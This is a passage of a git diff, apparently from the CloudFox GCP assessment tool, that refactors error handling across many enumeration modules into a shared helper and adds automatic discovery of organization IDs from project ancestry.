gcp/commands/workloadidentity.go | 26 +- .../accessPolicyService.go | 8 +- gcp/services/apikeysService/apikeysService.go | 12 +- .../artifactRegistryService.go | 8 +- gcp/services/assetService/assetService.go | 16 +- .../beyondcorpService/beyondcorpService.go | 9 +- .../bigqueryService/bigqueryService.go | 12 +- .../bigtableService/bigtableService.go | 4 +- .../bucketEnumService/bucketEnumService.go | 8 +- .../certManagerService/certManagerService.go | 9 +- .../cloudArmorService/cloudArmorService.go | 7 +- .../cloudbuildService/cloudbuildService.go | 8 +- .../cloudrunService/cloudrunService.go | 9 +- .../cloudsqlService/cloudsqlService.go | 5 +- .../composerService/composerService.go | 4 +- .../computeEngineService.go | 10 +- .../crossProjectService.go | 9 +- .../customRolesService/customRolesService.go | 5 +- .../dataflowService/dataflowService.go | 5 +- .../dataprocService/dataprocService.go | 6 +- gcp/services/dnsService/dnsService.go | 10 +- .../domainWideDelegationService.go | 5 +- .../filestoreService/filestoreService.go | 2 +- .../functionsService/functionsService.go | 5 +- gcp/services/gkeService/gkeService.go | 5 +- gcp/services/hmacService/hmacService.go | 4 +- gcp/services/iamService/iamService.go | 94 +++--- gcp/services/iapService/iapService.go | 10 +- gcp/services/kmsService/kmsService.go | 7 +- .../loadbalancerService.go | 9 +- gcp/services/loggingService/loggingService.go | 9 +- .../memorystoreService/memorystoreService.go | 4 +- .../networkEndpointsService.go | 7 +- .../notebooksService/notebooksService.go | 6 +- .../organizationsService.go | 20 +- .../orgpolicyService/orgpolicyService.go | 4 +- gcp/services/privescService/privescService.go | 4 +- gcp/services/pubsubService/pubsubService.go | 9 +- .../schedulerService/schedulerService.go | 5 +- gcp/services/secretsService/secretsService.go | 4 +- .../serviceAgentsService.go | 5 +- .../sourceReposService/sourceReposService.go | 5 +- gcp/services/spannerService/spannerService.go | 2 +- .../sshOsLoginService/sshOsLoginService.go | 13 +- gcp/services/vpcService/vpcService.go | 16 +- gcp/services/vpcscService/vpcscService.go | 12 +- .../workloadIdentityService.go | 13 +- internal/gcp/base.go | 83 +++++ internal/log.go | 8 +- 111 files changed, 906 insertions(+), 636 deletions(-) diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go index 3a2bf201..4f6c215f 100644 --- a/gcp/commands/accesslevels.go +++ b/gcp/commands/accesslevels.go @@ -10,6 +10,7 @@ import ( "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" ) var accessLevelOrgID string @@ -26,7 +27,9 @@ Features: - Identifies overly permissive access levels - Analyzes device policy requirements -Note: Requires organization ID (--org flag).`, +Organization Discovery: +- Automatically discovers organization from project ancestry if --org not specified +- Use --org to explicitly specify an organization ID`, Run: runGCPAccessLevelsCommand, } @@ -55,19 +58,60 @@ func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { return } - if accessLevelOrgID == "" { - cmdCtx.Logger.ErrorM("Organization ID is required. Use --org flag.", globals.GCP_ACCESSLEVELS_MODULE_NAME) - return + // Discover organizations if not specified + orgIDs := []string{} + if accessLevelOrgID != "" { + orgIDs = append(orgIDs, accessLevelOrgID) + } else { + // Auto-discover organizations from project ancestry + discoveredOrgs := discoverOrganizations(cmdCtx.Ctx, cmdCtx.ProjectIDs, cmdCtx.Logger) + if len(discoveredOrgs) == 0 { + cmdCtx.Logger.ErrorM("Could not discover any organizations. Use --org flag to specify one.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + orgIDs = discoveredOrgs + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + // Run for each organization + for _, orgID := range orgIDs { + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: orgID, + AccessLevels: []accesspolicyservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) + } +} + +// discoverOrganizations finds organization IDs from project ancestry +func discoverOrganizations(ctx context.Context, projectIDs []string, logger internal.Logger) []string { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil + } + + orgMap := make(map[string]bool) + for _, projectID := range projectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + continue + } + + for _, ancestor := range resp.Ancestor { + if ancestor.ResourceId.Type == "organization" { + orgMap[ancestor.ResourceId.Id] = true + } + } } - module := &AccessLevelsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - OrgID: accessLevelOrgID, - AccessLevels: []accesspolicyservice.AccessLevelInfo{}, - LootMap: make(map[string]*internal.LootFile), + var orgs []string + for orgID := range orgMap { + orgs = append(orgs, orgID) } - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) + return orgs } func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger) { @@ -77,7 +121,9 @@ func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger levels, err := svc.ListAccessLevels(m.OrgID) if err != nil { - logger.ErrorM(fmt.Sprintf("Could not list access levels: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + // Use shared error handling + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", m.OrgID)) return } diff --git a/gcp/commands/apikeys.go b/gcp/commands/apikeys.go index 14fcaef7..e21c16f7 100644 --- a/gcp/commands/apikeys.go +++ b/gcp/commands/apikeys.go @@ -127,9 +127,8 @@ func (m *APIKeysModule) processProject(ctx context.Context, projectID string, lo keys, err := service.ListAPIKeysWithKeyStrings(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating API keys in project %s: %v", projectID, err), globals.GCP_APIKEYS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_APIKEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) return } diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 94a8ee12..ce1d1f35 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -233,11 +233,11 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, // Get App Engine application app, err := aeService.Apps.Get(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - // App Engine not enabled is common, don't show as error - if !strings.Contains(err.Error(), "404") { - logger.ErrorM(fmt.Sprintf("Error getting App Engine app for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) - } + // App Engine not enabled is common, don't show as error + if !strings.Contains(err.Error(), "404") { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not get App Engine app in project %s", projectID)) } return } @@ -276,9 +276,9 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { services, err := aeService.Apps.Services.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing App Engine services for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine services in project %s", projectID)) return } @@ -316,9 +316,9 @@ func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID strin func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing App Engine versions for service %s: %v", serviceID, err), GCP_APPENGINE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine versions for service %s", serviceID)) return } @@ -444,9 +444,9 @@ func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serv func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing App Engine firewall rules for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine firewall rules in project %s", projectID)) return } diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 369b9642..a7dfe376 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -129,9 +129,8 @@ func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID s result, err := ars.RepositoriesAndArtifacts(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating artifact registries in project %s: %v", projectID, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Could not enumerate artifact registries in project %s", projectID)) return } diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 26ced4e2..cbd7ba9d 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -125,9 +125,9 @@ func (m *AssetInventoryModule) processProject(ctx context.Context, projectID str svc := assetservice.New() assets, err := svc.ListAssets(projectID, assetTypes) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list assets: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) return } @@ -147,9 +147,9 @@ func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID svc := assetservice.New() assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list assets with IAM: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets with IAM in project %s", projectID)) return } @@ -169,9 +169,9 @@ func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, project svc := assetservice.New() counts, err := svc.GetAssetTypeCounts(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not count assets: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not count assets in project %s", projectID)) return } diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 66ba8c0a..911fdaf7 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -286,9 +286,9 @@ func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID st }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing disks for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) } } @@ -320,9 +320,9 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing snapshots for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshots in project %s", projectID)) } // Track protected resources from snapshots @@ -440,9 +440,9 @@ func (m *BackupInventoryModule) enumerateSnapshotSchedules(ctx context.Context, }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing snapshot schedules for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshot schedules in project %s", projectID)) } } @@ -450,9 +450,9 @@ func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, project // List SQL instances instances, err := sqlService.Instances.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing SQL instances for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) return } diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 978e5ce1..911360bc 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -112,9 +112,8 @@ func (m *BigQueryModule) processProject(ctx context.Context, projectID string, l result, err := bqService.BigqueryDatasetsAndTables(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating BigQuery in project %s: %v", projectID, err), globals.GCP_BIGQUERY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERY_MODULE_NAME, + fmt.Sprintf("Could not enumerate BigQuery in project %s", projectID)) return } diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index c92bc79e..104acc08 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -73,9 +73,9 @@ func (m *BigtableModule) processProject(ctx context.Context, projectID string, l svc := bigtableservice.New() instances, err := svc.ListInstances(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Bigtable instances: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Bigtable instances in project %s", projectID)) return } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index c32ab437..f3d81d9d 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -115,9 +115,8 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, buckets, err := svc.GetBucketsList(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing buckets in project %s: %v", projectID, err), globals.GCP_BUCKETENUM_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) return } @@ -129,9 +128,9 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, for _, bucketName := range buckets { files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error scanning bucket %s: %v", bucketName, err), globals.GCP_BUCKETENUM_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) continue } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 63503b2e..392224e9 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -130,9 +130,8 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo buckets, err := cs.Buckets(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating buckets in project %s: %v", projectID, err), globals.GCP_BUCKETS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) return } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index ed0fcc1b..6007a29b 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -143,25 +143,25 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string // Get Certificate Manager certs certs, err := svc.GetCertificates(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting certificates for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificates in project %s", projectID)) } // Get classic SSL certs sslCerts, err := svc.GetSSLCertificates(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting SSL certificates for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate SSL certificates in project %s", projectID)) } // Get certificate maps certMaps, err := svc.GetCertificateMaps(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting certificate maps for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificate maps in project %s", projectID)) } m.mu.Lock() diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index c1828b4c..390afd76 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -128,17 +128,17 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, // Get security policies policies, err := svc.GetSecurityPolicies(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting policies for %s: %v", projectID, err), globals.GCP_CLOUDARMOR_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Armor security policies in project %s", projectID)) } // Get unprotected LBs unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting unprotected LBs for %s: %v", projectID, err), globals.GCP_CLOUDARMOR_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate unprotected load balancers in project %s", projectID)) } m.mu.Lock() diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index 075e5e5d..c711bad4 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -104,17 +104,17 @@ func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, // Get triggers triggers, err := cbSvc.ListTriggers(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list triggers: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build triggers in project %s", projectID)) } // Get recent builds builds, err := cbSvc.ListBuilds(projectID, 20) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list builds: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build builds in project %s", projectID)) } m.mu.Lock() diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 3d698d9f..9fe78fb7 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -128,9 +128,8 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l services, err := cs.Services(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Cloud Run services in project %s: %v", projectID, err), globals.GCP_CLOUDRUN_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) } else { m.mu.Lock() m.Services = append(m.Services, services...) @@ -144,9 +143,8 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l jobs, err := cs.Jobs(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Cloud Run jobs in project %s: %v", projectID, err), globals.GCP_CLOUDRUN_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) } else { m.mu.Lock() m.Jobs = append(m.Jobs, jobs...) diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index bf0960ab..954868af 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -136,9 +136,8 @@ func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, l instances, err := cs.Instances(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Cloud SQL in project %s: %v", projectID, err), globals.GCP_CLOUDSQL_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDSQL_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud SQL in project %s", projectID)) return } diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go index 039aeecf..237743bc 100644 --- a/gcp/commands/compliancedashboard.go +++ b/gcp/commands/compliancedashboard.go @@ -250,9 +250,8 @@ func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal func (m *ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { client, err := securitycenter.NewClient(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Failed to create Security Command Center client: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Security Command Center client") return } defer client.Close() @@ -292,9 +291,8 @@ func (m *ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logge func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { crmService, err := cloudresourcemanager.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Failed to create Resource Manager client: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Resource Manager client") return } @@ -1817,7 +1815,8 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte output, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not write output") } } diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 727099b2..7f32eaf8 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -91,9 +91,9 @@ func (m *ComposerModule) processProject(ctx context.Context, projectID string, l svc := composerservice.New() environments, err := svc.ListEnvironments(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Composer environments: %v", err), globals.GCP_COMPOSER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_COMPOSER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Composer environments in project %s", projectID)) return } diff --git a/gcp/commands/containersecurity.go b/gcp/commands/containersecurity.go index 05a45152..6e3acb4a 100644 --- a/gcp/commands/containersecurity.go +++ b/gcp/commands/containersecurity.go @@ -230,9 +230,9 @@ func (m *ContainerSecurityModule) analyzeCloudRunServices(ctx context.Context, p services, err := runService.Projects.Locations.Services.List(parent).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing Cloud Run services for project %s: %v", projectID, err), GCP_CONTAINERSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_CONTAINERSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) return } diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go index 8d8f196c..08e974f3 100644 --- a/gcp/commands/costsecurity.go +++ b/gcp/commands/costsecurity.go @@ -259,9 +259,9 @@ func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projec }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing instances for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate compute instances in project %s", projectID)) } } @@ -512,9 +512,9 @@ func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID st }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing disks for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) } } @@ -562,18 +562,18 @@ func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID stri }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing addresses for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate addresses in project %s", projectID)) } } func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { instances, err := sqlService.Instances.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing SQL instances for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) return } @@ -621,9 +621,9 @@ func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { buckets, err := storageService.Buckets.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - 